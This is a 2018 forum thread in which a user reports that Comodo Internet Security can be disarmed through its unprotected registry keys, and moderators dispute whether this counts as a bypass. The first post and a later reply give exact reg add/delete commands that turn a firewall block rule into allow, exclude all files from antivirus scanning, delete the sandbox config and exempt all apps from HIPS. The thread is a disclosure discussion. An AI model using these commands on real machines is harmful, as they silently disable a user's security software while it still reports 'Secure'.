Author Topic: Big scurity risk due to lack of CIS self-defense  (Read 3512 times)

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Big scurity risk due to lack of CIS self-defense
« on: June 29, 2018, 05:42:16 AM »
Programs or user-intruder can imperceptibly disarm CIS security subsystems with the backdoor by modifying the CIS configuration and even if it is password protected
in the following cases:

  • Each app with admin rights marked (auto or manually) as Trusted in CIS when CIS(AutoSandbox,HIPS):on & UAC:on
  • Each app marked (auto or manually) as Trusted in CIS when CIS(AutoSandbox,HIPS):on & UAC:off
  • Each app with admin rights when CIS(AutoSandbox,HIPS):off & UAC:on
  • Any app when CIS(AutoSandbox,HIPS):off & UAC:off
  • An user action from terminal or .reg import on an administrator account.
  • Probably also remotely from another computer on the local network when RemoteRegistry service is started.

Some examples:
  • Insidious modify the predefined factory firewall ruleset named "Blocked Application"

    I can read the rule details from cmd:
    C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0
        UID    REG_SZ    {8CA7CD91-648B-4A1D-AB2A-7711A6BC73F8}
        Days    REG_DWORD    0x7f
        StartHour    REG_DWORD    0x0
        StartMinute    REG_DWORD    0x0
        StopHour    REG_DWORD    0x0
        StopMinute    REG_DWORD    0x0
        ID    REG_DWORD    0x0
        Index    REG_DWORD    0x0
        Protocol    REG_DWORD    0x1
        Action    REG_DWORD    0x6
        Direction    REG_DWORD    0x3
        Description    REG_SZ    Block All Incoming and Outgoing Requests
        IPProto    REG_DWORD    0x0


    Hacking the rule:
    C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0 /v Action /t REG_DWORD /d 0x1 /f
    The operation completed successfully.


    Now, after system restart all firewall rules based on ruleset "Blocked Application" will works as "Allowed Application"

  • Annihilation of the anti-virus module

    Details of the factory ExcludedApplication rule for SearchIndexer.exe:
    C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0
        UID    REG_SZ    {C948AB6C-9E2D-43BA-8EDD-41FCD05D8344}
        Flags    REG_DWORD    0x0
        Filename    REG_SZ    C:\Windows\system32\SearchIndexer.exe
        DeviceName    REG_SZ    C:\Windows\System32\SearchIndexer.exe


    Adding ALL files to excluded applications:
    C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0 /v Filename /t REG_SZ /d *.* /f

    Now, after system restart viruses will be undetectable.

  • Disarmament of the automatic sandbox

    C:\Windows\system32>reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Sandbox /f

    After system restart all untrusted apps will run outside of the automatic sandbox.

  • Disarmament of the HIPS

    Details of the factory HIPS rule for %windir%\explorer.exe:
    C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2
        UID    REG_SZ    {E20272F6-EB6C-4816-84EB-FC1C971B8388}
        Flags    REG_DWORD    0x2
        Filename    REG_SZ    %windir%\explorer.exe
        DeviceName    REG_SZ    C:\Windows\explorer.exe
        Index    REG_DWORD    0x2
        TreatAs    REG_SZ    Windows System Application

    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2\Protections
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2\Rules


    ALL apps even untrusted will be treated as Windows System Application:
    C:\Windows\system32>reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2 /v Filename /t REG_SZ /d *.* /f
    The operation completed successfully.


    After system restart all untrusted apps will run freely without HIPS alerts.

I have recorded a short video showing the issue organoleptically https://youtu.be/RtWsRbhVIU0

Notes:
  • After the hacks the CIS Widget in spite of all indicates "Secure" on green and Support->Diagnostics returns "Diagnostics did not find any errors.", despite the fact that CIS no longer protects you from anything.
  • After the hack the restart is not nesserasy if the user modifies anything in the settings and confirms by OK.
  • I think CIS should block read/write access to its own registry keys at the driver level, regardless of configuration.
  • Tested on guest Win10 x64 1803 in VMware Workstation 14, CIS 11.0.0.6606 clean install.
« Last Edit: June 29, 2018, 10:51:01 PM by bazolo »

Offline John Buchanan

  • "Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well armed lamb contesting the outcome of the vote." ~ Benjamin Franklin
  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 6683
  • Personal Dragons can be defeated. Improve yourself
Re: Big scurity risk due to lack of CIS self-defense
« Reply #1 on: June 29, 2018, 10:51:40 AM »
CIS is designed to prevent running programs from making changes without authorization.  However, users can do what they wish..
If you are going to do something stupid to disarm CIS, don't blame CIS, blame the user.
Please follow Comodo Forum Policy

Bah! Ban 'em all! The only good member is a banned member
And a member is just a policy violator who hasn't been caught yet. >:-D

Offline !Wolverine!

  • Newbie
  • *
  • Posts: 14
Re: Big scurity risk due to lack of CIS self-defense
« Reply #2 on: June 29, 2018, 11:47:33 AM »
Tried it out and nothing happens with my config (Base is Pro Active and then some) and/or CIS is safe and maybe your installation is borked. Perhaps you are running with built-in administrator account or use TrustedInstaller privilegies when doing registry modifications? Anyways I got registry keys succesfully imported notification as administrator but prior and after reboot no registry changes really took place so CIS was intact. This was done in a VM with latest CIS, Windows and Pro Active+ config.

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #3 on: June 29, 2018, 06:26:11 PM »
Tried it out and nothing happens with my config (Base is Pro Active and then some) and/or CIS is safe

Try it:
C:\Windows\system32>reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs
    Num    REG_DWORD    0x3
    InstallPath    REG_SZ    C:\Program Files\COMODO\COMODO Internet Security
    InstallDriver    REG_DWORD    0x1
    Active    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\2


and check the value of the Active. I think that you have a different value
Replace your value in these and try it:
reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\Firewall\Predefined\4\Rules\0 /v Action /t REG_DWORD /d 0x1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\AV\Settings\ExcludedApplications\0 /v Filename /t REG_SZ /d *.* /f
reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Sandbox /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CmdAgent\CisConfigs\0\HIPS\Policy\2 /v Filename /t REG_SZ /d *.* /f


and maybe your installation is borked.

Excluded, I tested it on a clean 2 systems and new fresh installed CIS without any modifications with default config.

Perhaps you are running with built-in administrator account or use TrustedInstaller privilegies when doing registry modifications?

I think so, you mean the built-in administator account named administrator but no - I use typical user local acount type Administrator, like most users with temporary elevation of administrative rights with UAC when a request appears.

I recorded a short video showing the situation in a different light, without entering any commands, and by one confirmation with a mouse click.
I added the video link to the first post.


Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #4 on: June 29, 2018, 06:56:45 PM »
CIS is designed to prevent running programs from making changes without authorization.  However, users can do what they wish..
If you are going to do something stupid to disarm CIS, don't blame CIS, blame the user.

Hi John.
Of course, the weakest link in the security chain is a man, most of them do not know that he is doing something stupid - people are puzzled by window boxes, presuming that it should be confirmed. But sometimes some people have bad intentions.
Take a look at the video I just added to the first post. With just a click of the mouse on .reg file, can disarm the CIS without the user being aware that he is no longer protected.
In addition, applications with administrator rights can easily interfere in CIS settings, I think this is unacceptable.
A lot of trusted applications, even digitally signed, often catches security holes and in this case, they can easily allow the attacker to take full control over the CIS, making it useless as security guard.
Forgive me, but I do not agree with your downplaying the threat.

Offline EricJH

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 25409
Re: Big scurity risk due to lack of CIS self-defense
« Reply #5 on: June 29, 2018, 10:51:15 PM »
Hi John.
Of course, the weakest link in the security chain is a man, most of them do not know that he is doing something stupid - people are puzzled by window boxes, presuming that it should be confirmed. But sometimes some people have bad intentions.
Take a look at the video I just added to the first post. With just a click of the mouse on .reg file, can disarm the CIS without the user being aware that he is no longer protected.
Again it is the user doing questionable things. CIS allows the user to do so. It's how it's been build from the ground up. CIS is the nanny of program behaviour; not the nanny of user behavior.
Quote
In addition, applications with administrator rights can easily interfere in CIS settings, I think this is unacceptable.
A lot of trusted applications, even digitally signed, often catches security holes and in this case, they can easily allow the attacker to take full control over the CIS, making it useless as security guard.
Forgive me, but I do not agree with your downplaying the threat.

When programs get started by the user or another trusted program the user won't be notified unless when in Paranoid Mode.

When an unknown program starts a trusted program the user will get an alert. If you find a program that is unknown and is capable of modifying CIS settings or taking it down or start trusted application without alert please let us know. Comodo is always interested in these bypasses.

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #6 on: June 29, 2018, 11:22:48 PM »
(...) When an unknown program starts a trusted program the user will get an alert. If you find a program that is unknown and is capable of modifying CIS settings or taking it down or start trusted application without alert please let us know. Comodo is always interested in these bypasses.
Watch what I recorded https://youtu.be/RtWsRbhVIU0
I attached here this hack.reg file from the video which just run trusted application from microsoft but it does what I want with CIS, even bad things. I can neutralize CIS with one mouse click even if CIS has password protected Settings.

Offline Dennis2

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 9529
Re: Big scurity risk due to lack of CIS self-defense
« Reply #7 on: June 30, 2018, 02:56:21 AM »
Watch what I recorded https://youtu.be/RtWsRbhVIU0
I attached here this hack.reg file from the video which just run trusted application from microsoft but it does what I want with CIS, even bad things. I can neutralize CIS with one mouse click even if CIS has password protected Settings.
The only important thing in your post is 'I can'

Sorry until you produce a bypass which is actual one, you are wasting everyones time.

Thank you

Dennis
Moderator: Aims Forum a friendly place. Any concerns? Please PM me and/or review the Forum Policy 2012Updated.
System: Centos 7.5 x64, APF, HTTPS Everywhere, ABP, NoScript
 Fedora 28 x64, APF, HTTPS Everywhere, ABP

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #8 on: June 30, 2018, 07:53:05 AM »
The only important thing in your post is 'I can'


No, not just me.
The question is whether marked as "trusted" means 100% certainty that you can trust them if most of them is closed source?
What if a hacker signs an application with a stolen certificate on the basis of which each executable code is considered as trusted?

You should rather write "you and all (we only believe that) 'trusted' applications can freely modify CIS configuration".

Offline EricJH

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 25409
Re: Big scurity risk due to lack of CIS self-defense
« Reply #9 on: June 30, 2018, 08:51:38 AM »
No, not just me.
The question is whether marked as "trusted" means 100% certainty that you can trust them if most of them is closed source?
In the end there is no 100% certainty with this system. Comodo like any other security firm heavily relies on automated assessment. That's why there is Report trusted and whitelisted malware here- 2018 (NO LIVE MALWARE!) topic where we can report when we find a malware that slipped through the cracks.

Quote
What if a hacker signs an application with a stolen certificate on the basis of which each executable code is considered as trusted?
Then it's a bypass but this type of malware is rare. One that comes to mind is of course Stuxnet.

Quote
You should rather write "you and all (we only believe that) 'trusted' applications can freely modify CIS configuration".
The white list is there for ease of use for the big majority of users. If you feel that is not secure enough CIS empowers you to make your own decisions by using HIPS only and using Paranoid mode.

In the end it is finding the balance between usability and security that works best for your particular needs.

Offline liosant

  • Star Group
  • Comodo's Hero
  • *****
  • Posts: 1024
  • Terra é circo onde nós somos palhaços...
Re: Big scurity risk due to lack of CIS self-defense
« Reply #10 on: June 30, 2018, 12:19:22 PM »
file extensions .reg .bat as are easily found in file sharing sites, trojans use system applications (svchost, dllhost, rundll32, reg.exe ...) example:
conhost> cmd > run commandline delete or create registry

not exclusive CIS. >:-D

Offline prodex

  • Comodo's Hero
  • *****
  • Posts: 228
Re: Big scurity risk due to lack of CIS self-defense
« Reply #11 on: June 30, 2018, 12:35:55 PM »
Of course, bazolo is not wrong about opinion "...I do not agree with your downplaying the threat" as a common statement.

Because of this thread I was looking for more examples and found some succesfully tests for comodo with comodo and ransomware: ransomware vs. comodo.

In all the years I use cis I have never had problems with viruses, worms or trojans. Even if I was a little schocked to read of this issue I trust in comodo because of:

Posted by: EricJH
Quote
In the end there is no 100% certainty with this system. Comodo like any other security firm heavily relies on automated assessment. That's why there is Report trusted and whitelisted malware here- 2018 (NO LIVE MALWARE!) topic where we can report when we find a malware that slipped through the cracks.

Problems with trojans, ransomware. Man-in-the-middle a.s.o. is not only a problem for comodo. I feel protected well even with online banking knowing there is no 100% security but a high (I hope so).
« Last Edit: June 30, 2018, 01:53:55 PM by prodex »

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #12 on: June 30, 2018, 02:29:11 PM »
(...) The white list is there for ease of use for the big majority of users. If you feel that is not secure enough CIS empowers you to make your own decisions by using HIPS only and using Paranoid mode.

In the end it is finding the balance between usability and security that works best for your particular needs.

OMG. Guys, wait a minute. Do not blur the heart of the topic being discussed.

I do not criticize the 'whitelists' trust mechanism and granting automatic access to the system. It is cool and comfortable for users. And I love it.

I am asking only for something as trivial as to protect access to the branch of the registry responsible for the safe operation of CIS. Only it.


CIS looks a bit like an armored bodyguard in a state-of-the-art tungsten armor, with thousands of gadgets in a stuffed helmet,
but in Chinese flip-flops or barefoot, with an exposed Achilles heel.
Is it really such a big problem to forbid access to the CIS own keys in the windows registry?
Why do CIS protect own settings with password, if you can run regedit and change everything you want in CIS?
It's a bit funny that this password is supposed to give the impression of protecting settings, such a dummy.
« Last Edit: June 30, 2018, 02:31:51 PM by bazolo »

Offline Ploget

  • Comodo's Hero
  • *****
  • Posts: 883
  • 'Your best teacher, is your last mistake'
    • Traditional Protection
Re: Big scurity risk due to lack of CIS self-defense
« Reply #13 on: June 30, 2018, 02:47:37 PM »
What protection is that against you the owner / Admin / Big Cheese??  You would simply remove it or change it!

So you want to protect the Registry branch against yourself??

The point of the Password is to prevent users who DON'T have ultimate rights, changing important settings.  The same people or employees who do not have the rights to run Regedit or other critical functions!

I am asking only for something as trivial as to protect access to the branch of the registry responsible for the safe operation of CIS. Only it.


It's a bit funny that this password is supposed to give the impression of protecting settings, such a dummy.
« Last Edit: July 22, 2018, 03:17:37 AM by Ploget »
Ploget
 
Win10x64 Pro 1903 (18362.239) x 2
Win7x64 Pro x 2
CIS v.12.0.0.6870 & CCAV v.2.0.470195.867
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
'If you think you are too small to make a difference; try sleeping with a Mosquito'

Offline bazolo

  • Comodo Family Member
  • ***
  • Posts: 70
Re: Big scurity risk due to lack of CIS self-defense
« Reply #14 on: June 30, 2018, 03:10:02 PM »
What protection is that against you the owner / Admin / Big Cheese??  You would simply remove it or change it!

So you want to protect the Registry branch against yourself??

The point of the Password is to prevent users who DON'T have ultimate rights, changing important settings.  The same people or employees who who not have the rights to run Regedit or other critical functions!

You did not understand me. I do not want third-party applications to have access to CIS settings. Only the owner should have this right.

 

Free Endpoint Protection
Seo4Smf 2.0 © SmfMod.Com Smf Destek